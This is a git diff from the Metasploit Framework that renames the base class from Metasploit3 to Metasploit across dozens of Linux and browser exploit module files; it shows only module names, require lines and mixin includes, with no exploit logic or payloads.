Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/zen_load_balancer_exec.rb b/modules/exploits/linux/http/zen_load_balancer_exec.rb index 1097a5e7bf..d6d7b34e2f 100644 --- a/modules/exploits/linux/http/zen_load_balancer_exec.rb +++ b/modules/exploits/linux/http/zen_load_balancer_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb index 3a728421f4..e29e7ac7f9 100644 --- a/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb +++ b/modules/exploits/linux/http/zenoss_showdaemonxmlconfig_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb index 834763a5ad..befdd70669 100644 --- a/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb +++ b/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rexml/document' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient diff --git a/modules/exploits/linux/ids/snortbopre.rb b/modules/exploits/linux/ids/snortbopre.rb index 33c4fe64af..b2a55b7dcd 100644 --- a/modules/exploits/linux/ids/snortbopre.rb +++ b/modules/exploits/linux/ids/snortbopre.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/imap/imap_uw_lsub.rb b/modules/exploits/linux/imap/imap_uw_lsub.rb index a8eb39a855..81510cd7e7 100644 --- a/modules/exploits/linux/imap/imap_uw_lsub.rb +++ b/modules/exploits/linux/imap/imap_uw_lsub.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Brute diff --git a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb index d60f8cd99d..e3c75f79e2 100644 --- a/modules/exploits/linux/misc/accellion_fta_mpipe2.rb +++ b/modules/exploits/linux/misc/accellion_fta_mpipe2.rb @@ -9,7 +9,7 @@ require 'msf/core' require 'openssl' require 'rexml/element' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/misc/drb_remote_codeexec.rb b/modules/exploits/linux/misc/drb_remote_codeexec.rb index f1e7fa938d..0811d16c18 100644 --- a/modules/exploits/linux/misc/drb_remote_codeexec.rb +++ b/modules/exploits/linux/misc/drb_remote_codeexec.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'drb/drb' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking def initialize(info = {}) diff --git a/modules/exploits/linux/misc/gld_postfix.rb b/modules/exploits/linux/misc/gld_postfix.rb index d0fe8ca222..3851121ee4 100644 --- a/modules/exploits/linux/misc/gld_postfix.rb +++ b/modules/exploits/linux/misc/gld_postfix.rb @@ -7,7 +7,7 @@ require 'msf/core' - class Metasploit3 < Msf::Exploit::Remote + class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb index a41272c31f..122860f0c6 100644 --- a/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb +++ b/modules/exploits/linux/misc/hp_data_protector_cmd_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb index c48287ca88..2f2f423f43 100644 --- a/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb +++ b/modules/exploits/linux/misc/hp_nnmi_pmd_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Udp diff --git a/modules/exploits/linux/misc/hp_vsa_login_bof.rb b/modules/exploits/linux/misc/hp_vsa_login_bof.rb index 6798e4ff53..d71b366a7d 100644 --- a/modules/exploits/linux/misc/hp_vsa_login_bof.rb +++ b/modules/exploits/linux/misc/hp_vsa_login_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/hplip_hpssd_exec.rb b/modules/exploits/linux/misc/hplip_hpssd_exec.rb index 35658aaeda..1a208c3f44 100644 --- a/modules/exploits/linux/misc/hplip_hpssd_exec.rb +++ b/modules/exploits/linux/misc/hplip_hpssd_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_inet_connect.rb b/modules/exploits/linux/misc/ib_inet_connect.rb index b03053e9be..909f579131 100644 --- a/modules/exploits/linux/misc/ib_inet_connect.rb +++ b/modules/exploits/linux/misc/ib_inet_connect.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_jrd8_create_database.rb b/modules/exploits/linux/misc/ib_jrd8_create_database.rb index f29e9e831b..141fe2907c 100644 --- a/modules/exploits/linux/misc/ib_jrd8_create_database.rb +++ b/modules/exploits/linux/misc/ib_jrd8_create_database.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_open_marker_file.rb b/modules/exploits/linux/misc/ib_open_marker_file.rb index 745eebb2f2..324bd5c584 100644 --- a/modules/exploits/linux/misc/ib_open_marker_file.rb +++ b/modules/exploits/linux/misc/ib_open_marker_file.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb index 0c38798c19..f149fa1db1 100644 --- a/modules/exploits/linux/misc/ib_pwd_db_aliased.rb +++ b/modules/exploits/linux/misc/ib_pwd_db_aliased.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index a715ed69ab..dcaf1911ce 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/lprng_format_string.rb b/modules/exploits/linux/misc/lprng_format_string.rb index ea1f0cd5df..a28fc67c63 100644 --- a/modules/exploits/linux/misc/lprng_format_string.rb +++ b/modules/exploits/linux/misc/lprng_format_string.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/mongod_native_helper.rb b/modules/exploits/linux/misc/mongod_native_helper.rb index ff457795de..2c1c935106 100644 --- a/modules/exploits/linux/misc/mongod_native_helper.rb +++ b/modules/exploits/linux/misc/mongod_native_helper.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb index 2048a5c6fc..df1f821cf2 100644 --- a/modules/exploits/linux/misc/nagios_nrpe_arguments.rb +++ b/modules/exploits/linux/misc/nagios_nrpe_arguments.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'zlib' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/netsupport_manager_agent.rb b/modules/exploits/linux/misc/netsupport_manager_agent.rb index 1ab5730b3b..714d0fcf0a 100644 --- a/modules/exploits/linux/misc/netsupport_manager_agent.rb +++ b/modules/exploits/linux/misc/netsupport_manager_agent.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb index 479740e771..9c4f269a69 100644 --- a/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb +++ b/modules/exploits/linux/misc/novell_edirectory_ncp_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/sercomm_exec.rb b/modules/exploits/linux/misc/sercomm_exec.rb index 39e294bd2b..bf7aa452b8 100644 --- a/modules/exploits/linux/misc/sercomm_exec.rb +++ b/modules/exploits/linux/misc/sercomm_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/misc/zabbix_server_exec.rb b/modules/exploits/linux/misc/zabbix_server_exec.rb index 2376559d8d..69851c8136 100644 --- a/modules/exploits/linux/misc/zabbix_server_exec.rb +++ b/modules/exploits/linux/misc/zabbix_server_exec.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/mysql/mysql_yassl_getname.rb b/modules/exploits/linux/mysql/mysql_yassl_getname.rb index 4df096710f..09d38d6927 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_getname.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_getname.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/mysql/mysql_yassl_hello.rb b/modules/exploits/linux/mysql/mysql_yassl_hello.rb index bd086efcc5..e956bb1207 100644 --- a/modules/exploits/linux/mysql/mysql_yassl_hello.rb +++ b/modules/exploits/linux/mysql/mysql_yassl_hello.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb index e4a4c225b8..b6ec25438c 100644 --- a/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb +++ b/modules/exploits/linux/pop3/cyrus_pop3d_popsubfolders.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/postgres/postgres_payload.rb b/modules/exploits/linux/postgres/postgres_payload.rb index 0194930466..98d5103d63 100644 --- a/modules/exploits/linux/postgres/postgres_payload.rb +++ b/modules/exploits/linux/postgres/postgres_payload.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'msf/core/exploit/postgres' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Postgres diff --git a/modules/exploits/linux/pptp/poptop_negative_read.rb b/modules/exploits/linux/pptp/poptop_negative_read.rb index 59fc651054..5ed8900633 100644 --- a/modules/exploits/linux/pptp/poptop_negative_read.rb +++ b/modules/exploits/linux/pptp/poptop_negative_read.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Tcp diff --git a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb index bf98f0278a..fca3209778 100644 --- a/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb +++ b/modules/exploits/linux/proxy/squid_ntlm_authenticate.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Brute diff --git a/modules/exploits/linux/samba/chain_reply.rb b/modules/exploits/linux/samba/chain_reply.rb index ae73ad1779..b312c65076 100644 --- a/modules/exploits/linux/samba/chain_reply.rb +++ b/modules/exploits/linux/samba/chain_reply.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/linux/samba/lsa_transnames_heap.rb b/modules/exploits/linux/samba/lsa_transnames_heap.rb index ed72293621..2d64a5cc5d 100644 --- a/modules/exploits/linux/samba/lsa_transnames_heap.rb +++ b/modules/exploits/linux/samba/lsa_transnames_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/linux/samba/setinfopolicy_heap.rb b/modules/exploits/linux/samba/setinfopolicy_heap.rb index b5bbdc6329..bda3f491b4 100644 --- a/modules/exploits/linux/samba/setinfopolicy_heap.rb +++ b/modules/exploits/linux/samba/setinfopolicy_heap.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::Remote::DCERPC diff --git a/modules/exploits/linux/samba/trans2open.rb b/modules/exploits/linux/samba/trans2open.rb index 63f0fdc1a8..8fb2bbd56e 100644 --- a/modules/exploits/linux/samba/trans2open.rb +++ b/modules/exploits/linux/samba/trans2open.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::SMB::Client diff --git a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb index 2823d626f0..c4bfd42b7a 100644 --- a/modules/exploits/linux/smtp/exim4_dovecot_exec.rb +++ b/modules/exploits/linux/smtp/exim4_dovecot_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Smtp diff --git a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb index 4d77912786..4e36986c82 100644 --- a/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb +++ b/modules/exploits/linux/ssh/ceragon_fibeair_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Auxiliary::Report Rank = ExcellentRanking diff --git a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb index 7a460a0ac6..8c58e2dbbf 100644 --- a/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb +++ b/modules/exploits/linux/ssh/f5_bigip_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb index 3a33e74fb0..da5da5b4bc 100644 --- a/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb +++ b/modules/exploits/linux/ssh/loadbalancerorg_enterprise_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::Report diff --git a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb index 3a68d2f957..e34c477a65 100644 --- a/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb +++ b/modules/exploits/linux/ssh/quantum_dxi_known_privkey.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking def initialize(info = {}) diff --git a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb index 83e5191308..f40a004508 100644 --- a/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb +++ b/modules/exploits/linux/ssh/quantum_vmpro_backdoor.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/linux/ssh/symantec_smg_ssh.rb b/modules/exploits/linux/ssh/symantec_smg_ssh.rb index 4885234c97..0308883a29 100644 --- a/modules/exploits/linux/ssh/symantec_smg_ssh.rb +++ b/modules/exploits/linux/ssh/symantec_smg_ssh.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Auxiliary::CommandShell diff --git a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb index 1665ae8b2d..32058dab96 100644 --- a/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb +++ b/modules/exploits/linux/telnet/telnet_encrypt_keyid.rb @@ -9,7 +9,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::Telnet diff --git a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb index d65f048c33..75cfc31d08 100644 --- a/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb +++ b/modules/exploits/linux/upnp/dlink_upnp_msearch_exec.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::CmdStager diff --git a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb index fe94b76a68..d840f03466 100644 --- a/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb +++ b/modules/exploits/linux/upnp/miniupnpd_soap_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager diff --git a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb index 445567be76..2666536887 100644 --- a/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_hacking_team_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb index dcb5f9346a..2250c0753a 100644 --- a/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb index 1a6ef9ca70..899db27f36 100644 --- a/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb +++ b/modules/exploits/multi/browser/adobe_flash_net_connection_confusion.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb index bb4886ba44..75537d3f27 100644 --- a/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_opaque_background_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb index f79bc97fd5..641b2dddeb 100644 --- a/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb +++ b/modules/exploits/multi/browser/adobe_flash_pixel_bender_bof.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb index 68a671f847..ec7f48d97a 100644 --- a/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb +++ b/modules/exploits/multi/browser/adobe_flash_shader_drawing_fill.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb index 8c833f900e..2db1f45cbc 100644 --- a/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb +++ b/modules/exploits/multi/browser/adobe_flash_shader_job_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb index b040cd0391..21436f3317 100644 --- a/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb +++ b/modules/exploits/multi/browser/adobe_flash_uncompress_zlib_uaf.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = GreatRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_escape_retval.rb b/modules/exploits/multi/browser/firefox_escape_retval.rb index 55f244cdda..1d4906107a 100644 --- a/modules/exploits/multi/browser/firefox_escape_retval.rb +++ b/modules/exploits/multi/browser/firefox_escape_retval.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb index 7cf0100b51..0bc1b1e5af 100644 --- a/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb +++ b/modules/exploits/multi/browser/firefox_pdfjs_privilege_escalation.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb index 253f4b1b31..87ae96a364 100644 --- a/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb +++ b/modules/exploits/multi/browser/firefox_proto_crmfrequest.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_proxy_prototype.rb b/modules/exploits/multi/browser/firefox_proxy_prototype.rb index 8da445326f..c43defffcb 100644 --- a/modules/exploits/multi/browser/firefox_proxy_prototype.rb +++ b/modules/exploits/multi/browser/firefox_proxy_prototype.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ManualRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_queryinterface.rb b/modules/exploits/multi/browser/firefox_queryinterface.rb index 4511da4250..00df0c2ebd 100644 --- a/modules/exploits/multi/browser/firefox_queryinterface.rb +++ b/modules/exploits/multi/browser/firefox_queryinterface.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = NormalRanking # diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb index 6bfa1dc147..851e4c3633 100644 --- a/modules/exploits/multi/browser/firefox_svg_plugin.rb +++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb index ad5eda286d..c078c4da23 100644 --- a/modules/exploits/multi/browser/firefox_tostring_console_injection.rb +++ b/modules/exploits/multi/browser/firefox_tostring_console_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_webidl_injection.rb b/modules/exploits/multi/browser/firefox_webidl_injection.rb index 194c1920ba..6595e9d495 100644 --- a/modules/exploits/multi/browser/firefox_webidl_injection.rb +++ b/modules/exploits/multi/browser/firefox_webidl_injection.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/exploitation/jsobfu' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::BrowserExploitServer diff --git a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb index f76342cdbf..370a293267 100644 --- a/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb +++ b/modules/exploits/multi/browser/firefox_xpi_bootstrapped_addon.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'rex' require 'rex/zip' -class Metasploit3 < Msf::Exploit::Remote +class Metasploit < 